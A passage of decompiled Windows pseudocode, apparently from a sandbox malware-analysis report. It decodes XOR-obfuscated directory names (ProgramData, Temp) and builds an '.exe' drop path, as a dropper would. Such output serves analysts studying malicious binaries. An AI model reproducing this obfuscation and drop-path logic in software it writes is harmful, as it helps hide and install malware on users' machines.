										_push(_t1565);
										_push(_t1729);
									} else {
										_t1646 =  &_v312;
										_t1804 = _t1646 + 1;
										asm("o16 nop [eax+eax]");
										goto L36;
										L36:
										_t1385 =  *_t1646;
										_t1646 = _t1646 + 1;
										__eflags = _t1385;
										if(_t1385 != 0) {
											goto L36;
										} else {
											_push(_t1646 - _t1804);
											_push( &_v312);
										}
									}
									E004026B0(_t1412,  &_v408);
									E00406760(_t1412,  &_v384, _t1810); // executed
									_v28 = 1;
									_t1161 = E00417DF6( &_v384, __eflags);
									asm("cdq");
									_t1569 =  &_v360;
									E004055C0(_t1569, _t1161 % 0xa + 5);
									_push(_t1569);
									_v28 = 2;
									_t1164 = E0040C770( &_v488,  &_v408);
									_v28 = 3;
									_t1165 = E0040C990( &_v440, _t1164,  &_v384);
									_t1856 = _t1847 + 8;
									E00402490(_t1412,  &_v408, _t1165);
									_t1734 = _v420;
									__eflags = _t1734 - 0x10;
									if(_t1734 < 0x10) {
										L45:
										_v28 = 2;
										_t1735 = _v468;
										_v424 = 0;
										_v420 = 0xf;
										_v440 = 0;
										__eflags = _t1735 - 0x10;
										if(_t1735 < 0x10) {
											L49:
											_t1887 = _t1856 - 0x18;
											_v412 = _t1887;
											E0040BB90(_t1412, _t1887, _t1735, _t1810,  &_v360);
											_t1888 = _t1887 - 0x18;
											_v28 = 4;
											_t1575 = _t1888;
											E0040BB90(_t1412, _t1575, _t1735, _t1810,  &_v408);
											_v28 = 2;
											_t1171 = E00406800(_t1412, _t1575, _t1810, _t1817); // executed
											_t1889 = _t1888 + 0x30;
											__eflags = _t1171;
											if(_t1171 == 0) {
												_v413 = 0x2e;
												_t1810 =  *( *[fs:0x2c]);
												_t1173 =  *0x450f0c; // 0x0
												__eflags = _t1173 -  *((intOrPtr*)(_t1810 + 4));
												if(_t1173 >  *((intOrPtr*)(_t1810 + 4))) {
													E0040EF48(_t1173, 0x450f0c);
													_t1889 = _t1889 + 4;
													__eflags =  *0x450f0c - 0xffffffff;
													if(__eflags == 0) {
														asm("movaps xmm0, [0x439d90]");
														asm("movups [0x450ed4], xmm0");
														 *0x450ee4 = _v413;
														E0040F25B(_t1575, __eflags, 0x42d070);
														E0040EEFE(0x450f0c);
														_t1889 = _t1889 + 8;
													}
												}
												_t1174 =  *0x450ee4; // 0x0
												__eflags = _t1174;
												if(_t1174 != 0) {
													asm("movups xmm0, [0x450ed4]");
													asm("movaps xmm1, [0x439d30]");
													asm("pxor xmm1, xmm0");
													 *0x450ee4 = _t1174 ^ 0x0000002e;
													asm("movups [0x450ed4], xmm1");
												}
												_t1576 = 0x450ed4;
												_v336 = 0;
												_v320 = 0;
												_v316 = 0xf;
												_v336 = 0;
												_t158 = _t1576 + 1; // 0x450ed5
												_t1736 = _t158;
												asm("o16 nop [eax+eax]");
												do {
													_t1175 =  *_t1576;
													_t1576 = _t1576 + 1;
													__eflags = _t1175;
												} while (_t1175 != 0);
												E004026B0(_t1412,  &_v336, 0x450ed4, _t1576 - _t1736);
												_v28 = 7;
												_t1737 = _v316;
												_t1579 = _v320;
												__eflags = _t1737 - _t1579 - 1;
												if(_t1737 - _t1579 < 1) {
													_v412 = 0;
													_t1179 = E00402980(_t1412,  &_v336, _t1810, _t1817, 1, _v412, "\\", 1);
												} else {
													_t163 = _t1579 + 1; // 0x1
													__eflags = _t1737 - 0x10;
													_v320 = _t163;
													_t1348 =  >=  ? _v336 :  &_v336;
													 *((short*)(( >=  ? _v336 :  &_v336) + _t1579)) = 0x5c;
													_t1179 =  &_v336;
												}
												_v464 = 0;
												_v448 = 0;
												_v444 = 0;
												asm("movups xmm0, [eax]");
												asm("movups [ebp-0x1b8], xmm0");
												asm("movq xmm0, [eax+0x10]");
												asm("movq [ebp-0x1a8], xmm0");
												 *(_t1179 + 0x10) = 0;
												 *(_t1179 + 0x14) = 0xf;
												 *_t1179 = 0;
												_v28 = 8;
												_t1181 = E0040C990( &_v440,  &_v464,  &_v384);
												_t1856 = _t1889 + 4;
												E00402490(_t1412,  &_v408, _t1181);
												_t1739 = _v420;
												__eflags = _t1739 - 0x10;
												if(_t1739 < 0x10) {
													L90:
													_v28 = 7;
													_t1740 = _v444;
													_v424 = 0;
													_v420 = 0xf;
													_v440 = 0;
													__eflags = _t1740 - 0x10;
													if(_t1740 < 0x10) {
														L94:
														_v28 = 2;
														_t1741 = _v316;
														_v448 = 0;
														_v444 = 0xf;
														_v464 = 0;
														__eflags = _t1741 - 0x10;
														if(_t1741 < 0x10) {
															L98:
															_t1890 = _t1856 - 0x18;
															_v316 = _t1890;
															E0040BB90(_t1412, _t1890, _t1741, _t1810,  &_v360);
															_t1891 = _t1890 - 0x18;
															_v28 = 9;
															_t1584 = _t1891;
															E0040BB90(_t1412, _t1584, _t1741, _t1810,  &_v408);
															_v28 = 2;
															_t1187 = E00406800(_t1412, _t1584, _t1810, _t1817);
															_t1892 = _t1891 + 0x30;
															__eflags = _t1187;
															if(_t1187 == 0) {
																_t1188 =  *0x450ebc; // 0x0
																_v328 = 0x7e72146d;
																_v324 = 0x5c49415c;
																_v320 = 0x4f6a434f;
																_v316 = 0x4f5a;
																_v413 = 0x2e;
																__eflags = _t1188 -  *((intOrPtr*)(_t1810 + 4));
																if(_t1188 >  *((intOrPtr*)(_t1810 + 4))) {
																	E0040EF48(_t1188, 0x450ebc);
																	_t1892 = _t1892 + 4;
																	__eflags =  *0x450ebc - 0xffffffff;
																	if(__eflags == 0) {
																		asm("movq xmm0, [ebp-0x130]");
																		 *0x451020 = _v320;
																		 *0x451024 = _v316;
																		asm("movq [0x451018], xmm0");
																		 *0x451026 = _v413;
																		E0040F25B(_t1584, __eflags, 0x42d040);
																		E0040EEFE(0x450ebc);
																		_t1892 = _t1892 + 8;
																	}
																}
																__eflags =  *0x451026;
																if( *0x451026 != 0) {
																	_t1305 = 0;
																	__eflags = 0;
																	do {
																		 *(_t1305 + 0x451018) =  *(_t1305 + 0x451018) ^ 0x0000002e;
																		_t1305 = _t1305 + 1;
																		__eflags = _t1305 - 0xf;
																	} while (_t1305 < 0xf);
																}
																_t1585 = 0x451018;
																_v464 = 0;
																_v448 = 0;
																_v444 = 0xf;
																_v464 = 0;
																_t259 = _t1585 + 1; // 0x451019
																_t1742 = _t259;
																do {
																	_t1189 =  *_t1585;
																	_t1585 = _t1585 + 1;
																	__eflags = _t1189;
																} while (_t1189 != 0);
																E004026B0(_t1412,  &_v464, 0x451018, _t1585 - _t1742);
																_v28 = 0xc;
																_t1743 = _v444;
																_t1588 = _v448;
																__eflags = _t1743 - _t1588 - 1;
																if(_t1743 - _t1588 < 1) {
																	_v412 = 0;
																	_t1193 = E00402980(_t1412,  &_v464, _t1810, _t1817, 1, _v412, "\\", 1);
																} else {
																	_t264 = _t1588 + 1; // 0x1
																	__eflags = _t1743 - 0x10;
																	_v448 = _t264;
																	_t1304 =  >=  ? _v464 :  &_v464;
																	 *((short*)(( >=  ? _v464 :  &_v464) + _t1588)) = 0x5c;
																	_t1193 =  &_v464;
																}
																_v440 = 0;
																_v424 = 0;
																_v420 = 0;
																asm("movups xmm0, [eax]");
																asm("movups [ebp-0x1a0], xmm0");
																asm("movq xmm0, [eax+0x10]");
																asm("movq [ebp-0x190], xmm0");
																 *(_t1193 + 0x10) = 0;
																 *(_t1193 + 0x14) = 0xf;
																 *_t1193 = 0;
																_v28 = 0xd;
																_t1195 = E0040C990( &_v488,  &_v440,  &_v384);
																_t1856 = _t1892 + 4;
																E00402490(_t1412,  &_v408, _t1195);
																_t1745 = _v468;
																__eflags = _t1745 - 0x10;
																if(_t1745 < 0x10) {
																	L135:
																	_v28 = 0xc;
																	_t1746 = _v420;
																	_v472 = 0;
																	_v468 = 0xf;
																	_v488 = 0;
																	__eflags = _t1746 - 0x10;
																	if(_t1746 < 0x10) {
																		L139:
																		_v28 = 2;
																		_t1747 = _v444;
																		_v424 = 0;
																		_v420 = 0xf;
																		_v440 = 0;
																		__eflags = _t1747 - 0x10;
																		if(_t1747 < 0x10) {
																			L143:
																			_t1893 = _t1856 - 0x18;
																			_v316 = _t1893;
																			E0040BB90(_t1412, _t1893, _t1747, _t1810,  &_v360);
																			_t1894 = _t1893 - 0x18;
																			_v28 = 0xe;
																			_t1593 = _t1894;
																			E0040BB90(_t1412, _t1593, _t1747, _t1810,  &_v408);
																			_v28 = 2;
																			_t1201 = E00406800(_t1412, _t1593, _t1810, _t1817);
																			_t1895 = _t1894 + 0x30;
																			__eflags = _t1201;
																			if(_t1201 == 0) {
																				_t1202 =  *0x450f20; // 0x0
																				_v320 = 0x7a72146d;
																				_v316 = 0x2e5e434b;
																				__eflags = _t1202 -  *((intOrPtr*)(_t1810 + 4));
																				if(_t1202 >  *((intOrPtr*)(_t1810 + 4))) {
																					E0040EF48(_t1202, 0x450f20);
																					_t1895 = _t1895 + 4;
																					__eflags =  *0x450f20 - 0xffffffff;
																					if(__eflags == 0) {
																						 *0x450f58 = _v320;
																						 *0x450f5c = _v316;
																						E0040F25B(_v316, __eflags, 0x42d030);
																						E0040EEFE(0x450f20);
																						_t1895 = _t1895 + 8;
																					}
																				}
																				_t1203 =  *0x450f5f; // 0x0
																				__eflags = _t1203;
																				if(_t1203 != 0) {
																					 *0x450f58 =  *0x450f58 ^ 0x0000002e;
																					 *0x450f59 =  *0x450f59 ^ 0x0000002e;
																					 *0x450f5a =  *0x450f5a ^ 0x0000002e;
																					 *0x450f5b =  *0x450f5b ^ 0x0000002e;
																					 *0x450f5c =  *0x450f5c ^ 0x0000002e;
																					 *0x450f5d =  *0x450f5d ^ 0x0000002e;
																					 *0x450f5e =  *0x450f5e ^ 0x0000002e;
																					_t1263 = _t1203 ^ 0x0000002e;
																					__eflags = _t1263;
																					 *0x450f5f = _t1263;
																				}
																				_t1594 = 0x450f58;
																				_v464 = 0;
																				_v448 = 0;
																				_v444 = 0xf;
																				_v464 = 0;
																				_t354 =  &(_t1594[1]); // 0x450f59
																				_t1748 = _t354;
																				do {
																					_t1204 =  *_t1594;
																					_t1594 =  &(_t1594[1]);
																					__eflags = _t1204;
																				} while (_t1204 != 0);
																				E004026B0(_t1412,  &_v464, 0x450f58, _t1594 - _t1748);
																				_v28 = 0x11;
																				_t1749 = _v444;
																				_t1597 = _v448;
																				__eflags = _t1749 - _t1597 - 1;
																				if(_t1749 - _t1597 < 1) {
																					_v412 = 0;
																					_t1208 = E00402980(_t1412,  &_v464, _t1810, _t1817, 1, _v412, "\\", 1);
																				} else {
																					_t359 = _t1597 + 1; // 0x1
																					__eflags = _t1749 - 0x10;
																					_v448 = _t359;
																					_t1262 =  >=  ? _v464 :  &_v464;
																					 *((short*)(( >=  ? _v464 :  &_v464) + _t1597)) = 0x5c;
																					_t1208 =  &_v464;
																				}
																				_v440 = 0;
																				_v424 = 0;
																				_v420 = 0;
																				asm("movups xmm0, [eax]");
																				asm("movups [ebp-0x1a0], xmm0");
																				asm("movq xmm0, [eax+0x10]");
																				asm("movq [ebp-0x190], xmm0");
																				 *(_t1208 + 0x10) = 0;
																				 *(_t1208 + 0x14) = 0xf;
																				 *_t1208 = 0;
																				_v28 = 0x12;
																				_t1210 = E0040C990( &_v488,  &_v440,  &_v384);
																				_t1856 = _t1895 + 4;
																				E00402490(_t1412,  &_v408, _t1210);
																				_t1751 = _v468;
																				__eflags = _t1751 - 0x10;
																				if(_t1751 < 0x10) {
																					L179:
																					_v28 = 0x11;
																					_t1752 = _v420;
																					_v472 = 0;
																					_v468 = 0xf;
																					_v488 = 0;
																					__eflags = _t1752 - 0x10;
																					if(_t1752 < 0x10) {
																						L183:
																						_v28 = 2;
																						_t1753 = _v444;
																						_v424 = 0;
																						_v420 = 0xf;
																						_v440 = 0;
																						__eflags = _t1753 - 0x10;
																						if(_t1753 < 0x10) {
																							L187:
																							_t1896 = _t1856 - 0x18;
																							_v316 = _t1896;
																							E0040BB90(_t1412, _t1896, _t1753, _t1810,  &_v360);
																							_t1897 = _t1896 - 0x18;
																							_v28 = 0x13;
																							_t1602 = _t1897;
																							E0040BB90(_t1412, _t1602, _t1753, _t1810,  &_v408);
																							_v28 = 2;
																							_t1216 = E00406800(_t1412, _t1602, _t1810, _t1817);
																							_t1856 = _t1897 + 0x30;
																							__eflags = _t1216;
																							if(_t1216 == 0) {
																								_v28 = 1;
																								_t1754 = _v340;
																								__eflags = _t1754 - 0x10;
																								if(_t1754 < 0x10) {
																									L213:
																									_v28 = 0;
																									_t1680 = _v364;
																									_v344 = 0;
																									_v340 = 0xf;
																									_v360 = 0;
																									__eflags = _t1680 - 0x10;
																									if(_t1680 < 0x10) {
																										L342:
																										E00402510(_t1817, 0x4399f7);
																										L343:
																										E00402440(_t1412,  &_v408);
																										goto L344;
																									} else {
																										_t1603 = _v384;
																										_t1680 =  &(1[_t1680]);
																										_t1217 = _t1603;
																										__eflags = _t1680 - 0x1000;
																										if(_t1680 < 0x1000) {
																											L216:
																											_push(_t1680);
																											E0040EDFF(_t1603);
																											goto L342;
																										} else {
																											_t1470 =  *((intOrPtr*)(_t1603 - 4));
																											_t1680 = _t1680 + 0x23;
																											__eflags = _t1217 -  *((intOrPtr*)(_t1603 - 4)) + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L346;
																											} else {
																												goto L216;
																											}
																										}
																									}
																								} else {
																									_t1604 = _v360;
																									_t1755 = _t1754 + 1;
																									_t1221 = _t1604;
																									__eflags = _t1755 - 0x1000;
																									if(_t1755 < 0x1000) {
																										L212:
																										_push(_t1755);
																										E0040EDFF(_t1604);
																										_t1856 = _t1856 + 8;
																										goto L213;
																									} else {
																										_t1470 =  *((intOrPtr*)(_t1604 - 4));
																										_t1680 = _t1755 + 0x23;
																										__eflags = _t1221 -  *((intOrPtr*)(_t1604 - 4)) + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L346;
																										} else {
																											goto L212;
																										}
																									}
																								}
																							} else {
																								_push(_t1602);
																								_t1225 = E0040C770( &_v440,  &_v408);
																								_v28 = 0x14;
																								_t1226 = E0040C990( &_v488, _t1225,  &_v360);
																								_t1856 = _t1856 + 8;
																								_t1608 = _t1226;
																								_v28 = 0x15;
																								_t1810 =  *(_t1608 + 0x14);
																								_t1758 =  *(_t1608 + 0x10);
																								__eflags = _t1810 - _t1758 - 4;
																								if(_t1810 - _t1758 < 4) {
																									_v412 = 0;
																									_t1608 = E00402980(_t1412, _t1608, _t1810, _t1817, 4, _v412, ".exe", 4);
																								} else {
																									 *(_t1608 + 0x10) =  &(_t1758->lpSecurityDescriptor);
																									_t1247 = _t1608;
																									__eflags = _t1810 - 0x10;
																									if(_t1810 >= 0x10) {
																										_t1247 =  *_t1608;
																									}
																									 *((intOrPtr*)(_t1247 + _t1758)) = 0x6578652e;
																									 *((char*)(_t1247 +  &(_t1758->lpSecurityDescriptor))) = 0;
																								}
																								 *_t1817 = 0;
																								 *(_t1817 + 0x10) = 0;
																								 *(_t1817 + 0x14) = 0;
																								asm("movups xmm0, [ecx]");
																								asm("movups [esi], xmm0");
																								asm("movq xmm0, [ecx+0x10]");
																								asm("movq [esi+0x10], xmm0");
																								 *(_t1608 + 0x10) = 0;
																								 *(_t1608 + 0x14) = 0xf;
																								 *_t1608 = 0;
																								_t1759 = _v468;
																								__eflags = _t1759 - 0x10;
																								if(_t1759 < 0x10) {
																									L197:
																									_t1760 = _v420;
																									_v472 = 0;
																									_v468 = 0xf;
																									_v488 = 0;
																									__eflags = _t1760 - 0x10;
																									if(_t1760 < 0x10) {
																										L201:
																										_t1761 = _v340;
																										_v424 = 0;
																										_v420 = 0xf;
																										_v440 = 0;
																										__eflags = _t1761 - 0x10;
																										if(_t1761 < 0x10) {
																											L205:
																											_t1762 = _v364;
																											_v344 = 0;
																											_v340 = 0xf;
																											_v360 = 0;
																											__eflags = _t1762 - 0x10;
																											if(_t1762 < 0x10) {
																												goto L71;
																											} else {
																												_t1609 = _v384;
																												_t1763 = _t1762 + 1;
																												_t1230 = _t1609;
																												__eflags = _t1763 - 0x1000;
																												if(_t1763 < 0x1000) {
																													goto L70;
																												} else {
																													_t1470 =  *((intOrPtr*)(_t1609 - 4));
																													_t1680 = _t1763 + 0x23;
																													__eflags = _t1230 -  *((intOrPtr*)(_t1609 - 4)) + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														goto L346;
																													} else {
																														goto L70;
																													}
																												}
																											}
																										} else {
																											_t1610 = _v360;
																											_t1764 = _t1761 + 1;
																											_t1234 = _t1610;
																											__eflags = _t1764 - 0x1000;
																											if(_t1764 < 0x1000) {
																												L204:
																												_push(_t1764);
																												E0040EDFF(_t1610);
																												_t1856 = _t1856 + 8;
																												goto L205;
																											} else {
																												_t1470 =  *((intOrPtr*)(_t1610 - 4));
																												_t1680 = _t1764 + 0x23;
																												__eflags = _t1234 -  *((intOrPtr*)(_t1610 - 4)) + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													goto L346;
																												} else {
																													goto L204;
																												}
																											}
																										}
																									} else {
																										_t1611 = _v440;
																										_t1765 =  &(_t1760->nLength);
																										_t1238 = _t1611;
																										__eflags = _t1765 - 0x1000;
																										if(_t1765 < 0x1000) {
																											L200:
																											_push(_t1765);
																											E0040EDFF(_t1611);
																											_t1856 = _t1856 + 8;
																											goto L201;
																										} else {
																											_t1470 =  *((intOrPtr*)(_t1611 - 4));
																											_t1680 = _t1765 + 0x23;
																											__eflags = _t1238 -  *((intOrPtr*)(_t1611 - 4)) + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L346;
																											} else {
																												goto L200;
																											}
																										}
																									}
																								} else {
																									_t1612 = _v488;
																									_t1766 = _t1759 + 1;
																									_t1242 = _t1612;
																									__eflags = _t1766 - 0x1000;
																									if(_t1766 < 0x1000) {
																										L196:
																										_push(_t1766);
																										E0040EDFF(_t1612);
																										_t1856 = _t1856 + 8;
																										goto L197;
																									} else {
																										_t1470 =  *((intOrPtr*)(_t1612 - 4));
																										_t1680 = _t1766 + 0x23;
																										__eflags = _t1242 -  *((intOrPtr*)(_t1612 - 4)) + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L346;
																										} else {
																											goto L196;
																										}
																									}
																								}
																							}
																						} else {
																							_t1613 = _v464;
																							_t1753 =  &(_t1753->nLength);
																							_t1248 = _t1613;
																							__eflags = _t1753 - 0x1000;
																							if(_t1753 < 0x1000) {
																								L186:
																								_push(_t1753);
																								E0040EDFF(_t1613);
																								_t1856 = _t1856 + 8;
																								goto L187;
																							} else {
																								_t1470 =  *((intOrPtr*)(_t1613 - 4));
																								_t1680 = _t1753 + 0x23;
																								__eflags = _t1248 -  *((intOrPtr*)(_t1613 - 4)) + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L346;
																								} else {
																									goto L186;
																								}
																							}
																						}
																					} else {
																						_t1614 = _v440;
																						_t1767 =  &(_t1752->nLength);
																						_t1252 = _t1614;
																						__eflags = _t1767 - 0x1000;
																						if(_t1767 < 0x1000) {
																							L182:
																							_push(_t1767);
																							E0040EDFF(_t1614);
																							_t1856 = _t1856 + 8;
																							goto L183;
																						} else {
																							_t1470 =  *((intOrPtr*)(_t1614 - 4));
																							_t1680 = _t1767 + 0x23;
																							__eflags = _t1252 -  *((intOrPtr*)(_t1614 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L346;
																							} else {
																								goto L182;
																							}
																						}
																					}
																				} else {
																					_t1615 = _v488;
																					_t1768 = _t1751 + 1;
																					_t1256 = _t1615;
																					__eflags = _t1768 - 0x1000;
																					if(_t1768 < 0x1000) {
																						L178:
																						_push(_t1768);
																						E0040EDFF(_t1615);
																						_t1856 = _t1856 + 8;
																						goto L179;
																					} else {
																						_t1470 =  *((intOrPtr*)(_t1615 - 4));
																						_t1680 = _t1768 + 0x23;
																						__eflags = _t1256 -  *((intOrPtr*)(_t1615 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L346;
																						} else {
																							goto L178;
																						}
																					}
																				}
																			} else {
																				_push(_t1593);
																				_t1268 = E0040C770( &_v440,  &_v408);
																				_v28 = 0xf;
																				_t1269 = E0040C990( &_v488, _t1268,  &_v360);
																				_t1856 = _t1895 + 8;
																				_t1620 = _t1269;
																				_v28 = 0x10;
																				_t1810 =  *(_t1620 + 0x14);
																				_t1771 =  *(_t1620 + 0x10);
																				__eflags = _t1810 - _t1771 - 4;
																				if(_t1810 - _t1771 < 4) {
																					_v412 = 0;
																					_t1620 = E00402980(_t1412, _t1620, _t1810, _t1817, 4, _v412, ".exe", 4);
																				} else {
																					 *(_t1620 + 0x10) =  &(_t1771->lpSecurityDescriptor);
																					_t1289 = _t1620;
																					__eflags = _t1810 - 0x10;
																					if(_t1810 >= 0x10) {
																						_t1289 =  *_t1620;
																					}
																					 *((intOrPtr*)(_t1289 + _t1771)) = 0x6578652e;
																					 *((char*)(_t1289 +  &(_t1771->lpSecurityDescriptor))) = 0;
																				}
																				 *_t1817 = 0;
																				 *(_t1817 + 0x10) = 0;
																				 *(_t1817 + 0x14) = 0;
																				asm("movups xmm0, [ecx]");
																				asm("movups [esi], xmm0");
																				asm("movq xmm0, [ecx+0x10]");
																				asm("movq [esi+0x10], xmm0");
																				 *(_t1620 + 0x10) = 0;
																				 *(_t1620 + 0x14) = 0xf;
																				 *_t1620 = 0;
																				_t1772 = _v468;
																				__eflags = _t1772 - 0x10;
																				if(_t1772 < 0x10) {
																					L153:
																					_t1773 = _v420;
																					_v472 = 0;
																					_v468 = 0xf;
																					_v488 = 0;
																					__eflags = _t1773 - 0x10;
																					if(_t1773 < 0x10) {
																						L157:
																						_t1774 = _v340;
																						_v424 = 0;
																						_v420 = 0xf;
																						_v440 = 0;
																						__eflags = _t1774 - 0x10;
																						if(_t1774 < 0x10) {
																							L161:
																							_t1775 = _v364;
																							_v344 = 0;
																							_v340 = 0xf;
																							_v360 = 0;
																							__eflags = _t1775 - 0x10;
																							if(_t1775 < 0x10) {
																								goto L71;
																							} else {
																								_t1609 = _v384;
																								_t1763 = _t1775 + 1;
																								_t1273 = _t1609;
																								__eflags = _t1763 - 0x1000;
																								if(_t1763 < 0x1000) {
																									goto L70;
																								} else {
																									_t1470 =  *((intOrPtr*)(_t1609 - 4));
																									_t1680 = _t1763 + 0x23;
																									__eflags = _t1273 -  *((intOrPtr*)(_t1609 - 4)) + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L346;
																									} else {
																										goto L70;
																									}
																								}
																							}
																						} else {
																							_t1621 = _v360;
																							_t1776 = _t1774 + 1;
																							_t1276 = _t1621;
																							__eflags = _t1776 - 0x1000;
																							if(_t1776 < 0x1000) {
																								L160:
																								_push(_t1776);
																								E0040EDFF(_t1621);
																								_t1856 = _t1856 + 8;
																								goto L161;
																							} else {
																								_t1470 =  *((intOrPtr*)(_t1621 - 4));
																								_t1680 = _t1776 + 0x23;
																								__eflags = _t1276 -  *((intOrPtr*)(_t1621 - 4)) + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L346;
																								} else {
																									goto L160;
																								}
																							}
																						}
																					} else {
																						_t1622 = _v440;
																						_t1777 =  &(_t1773->nLength);
																						_t1280 = _t1622;
																						__eflags = _t1777 - 0x1000;
																						if(_t1777 < 0x1000) {
																							L156:
																							_push(_t1777);
																							E0040EDFF(_t1622);
																							_t1856 = _t1856 + 8;
																							goto L157;
																						} else {
																							_t1470 =  *((intOrPtr*)(_t1622 - 4));
																							_t1680 = _t1777 + 0x23;
																							__eflags = _t1280 -  *((intOrPtr*)(_t1622 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L346;
																							} else {
																								goto L156;
																							}
																						}
																					}
																				} else {
																					_t1623 = _v488;
																					_t1778 = _t1772 + 1;
																					_t1284 = _t1623;
																					__eflags = _t1778 - 0x1000;
																					if(_t1778 < 0x1000) {
																						L152:
																						_push(_t1778);
																						E0040EDFF(_t1623);
																						_t1856 = _t1856 + 8;
																						goto L153;
																					} else {
																						_t1470 =  *((intOrPtr*)(_t1623 - 4));
																						_t1680 = _t1778 + 0x23;
																						__eflags = _t1284 -  *((intOrPtr*)(_t1623 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L346;
																						} else {
																							goto L152;
																						}
																					}
																				}
																			}
																		} else {
																			_t1624 = _v464;
																			_t1747 =  &(_t1747->nLength);
																			_t1290 = _t1624;
																			__eflags = _t1747 - 0x1000;
																			if(_t1747 < 0x1000) {
																				L142:
																				_push(_t1747);
																				E0040EDFF(_t1624);
																				_t1856 = _t1856 + 8;
																				goto L143;
																			} else {
																				_t1470 =  *((intOrPtr*)(_t1624 - 4));
																				_t1680 = _t1747 + 0x23;
																				__eflags = _t1290 -  *((intOrPtr*)(_t1624 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L142;
																				}
																			}
																		}
																	} else {
																		_t1625 = _v440;
																		_t1779 =  &(_t1746->nLength);
																		_t1294 = _t1625;
																		__eflags = _t1779 - 0x1000;
																		if(_t1779 < 0x1000) {
																			L138:
																			_push(_t1779);
																			E0040EDFF(_t1625);
																			_t1856 = _t1856 + 8;
																			goto L139;
																		} else {
																			_t1470 =  *((intOrPtr*)(_t1625 - 4));
																			_t1680 = _t1779 + 0x23;
																			__eflags = _t1294 -  *((intOrPtr*)(_t1625 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L138;
																			}
																		}
																	}
																} else {
																	_t1626 = _v488;
																	_t1780 = _t1745 + 1;
																	_t1298 = _t1626;
																	__eflags = _t1780 - 0x1000;
																	if(_t1780 < 0x1000) {
																		L134:
																		_push(_t1780);
																		E0040EDFF(_t1626);
																		_t1856 = _t1856 + 8;
																		goto L135;
																	} else {
																		_t1470 =  *((intOrPtr*)(_t1626 - 4));
																		_t1680 = _t1780 + 0x23;
																		__eflags = _t1298 -  *((intOrPtr*)(_t1626 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L134;
																		}
																	}
																}
															} else {
																_push(_t1584);
																_t1312 = E0040C770( &_v464,  &_v408);
																_v28 = 0xa;
																_t1313 = E0040C990( &_v440, _t1312,  &_v360);
																_t1856 = _t1892 + 8;
																_t1630 = _t1313;
																_v28 = 0xb;
																_t1810 =  *(_t1630 + 0x14);
																_t1783 =  *(_t1630 + 0x10);
																__eflags = _t1810 - _t1783 - 4;
																if(_t1810 - _t1783 < 4) {
																	_v412 = 0;
																	_t1630 = E00402980(_t1412, _t1630, _t1810, _t1817, 4, _v412, ".exe", 4);
																} else {
																	 *(_t1630 + 0x10) =  &(_t1783->lpSecurityDescriptor);
																	_t1333 = _t1630;
																	__eflags = _t1810 - 0x10;
																	if(_t1810 >= 0x10) {
																		_t1333 =  *_t1630;
																	}
																	 *((intOrPtr*)(_t1333 + _t1783)) = 0x6578652e;
																	 *((char*)(_t1333 +  &(_t1783->lpSecurityDescriptor))) = 0;
																}
																 *_t1817 = 0;
																 *(_t1817 + 0x10) = 0;
																 *(_t1817 + 0x14) = 0;
																asm("movups xmm0, [ecx]");
																asm("movups [esi], xmm0");
																asm("movq xmm0, [ecx+0x10]");
																asm("movq [esi+0x10], xmm0");
																 *(_t1630 + 0x10) = 0;
																 *(_t1630 + 0x14) = 0xf;
																 *_t1630 = 0;
																_t1784 = _v420;
																__eflags = _t1784 - 0x10;
																if(_t1784 < 0x10) {
																	L108:
																	_t1785 = _v444;
																	_v424 = 0;
																	_v420 = 0xf;
																	_v440 = 0;
																	__eflags = _t1785 - 0x10;
																	if(_t1785 < 0x10) {
																		L112:
																		_t1786 = _v340;
																		_v448 = 0;
																		_v444 = 0xf;
																		_v464 = 0;
																		__eflags = _t1786 - 0x10;
																		if(_t1786 < 0x10) {
																			L116:
																			_t1787 = _v364;
																			_v344 = 0;
																			_v340 = 0xf;
																			_v360 = 0;
																			__eflags = _t1787 - 0x10;
																			if(_t1787 < 0x10) {
																				goto L71;
																			} else {
																				_t1609 = _v384;
																				_t1763 = _t1787 + 1;
																				_t1317 = _t1609;
																				__eflags = _t1763 - 0x1000;
																				if(_t1763 < 0x1000) {
																					goto L70;
																				} else {
																					_t1470 =  *((intOrPtr*)(_t1609 - 4));
																					_t1680 = _t1763 + 0x23;
																					__eflags = _t1317 -  *((intOrPtr*)(_t1609 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L346;
																					} else {
																						goto L70;
																					}
																				}
																			}
																		} else {
																			_t1631 = _v360;
																			_t1788 = _t1786 + 1;
																			_t1320 = _t1631;
																			__eflags = _t1788 - 0x1000;
																			if(_t1788 < 0x1000) {
																				L115:
																				_push(_t1788);
																				E0040EDFF(_t1631);
																				_t1856 = _t1856 + 8;
																				goto L116;
																			} else {
																				_t1470 =  *((intOrPtr*)(_t1631 - 4));
																				_t1680 = _t1788 + 0x23;
																				__eflags = _t1320 -  *((intOrPtr*)(_t1631 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L115;
																				}
																			}
																		}
																	} else {
																		_t1632 = _v464;
																		_t1789 =  &(_t1785->nLength);
																		_t1324 = _t1632;
																		__eflags = _t1789 - 0x1000;
																		if(_t1789 < 0x1000) {
																			L111:
																			_push(_t1789);
																			E0040EDFF(_t1632);
																			_t1856 = _t1856 + 8;
																			goto L112;
																		} else {
																			_t1470 =  *((intOrPtr*)(_t1632 - 4));
																			_t1680 = _t1789 + 0x23;
																			__eflags = _t1324 -  *((intOrPtr*)(_t1632 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L111;
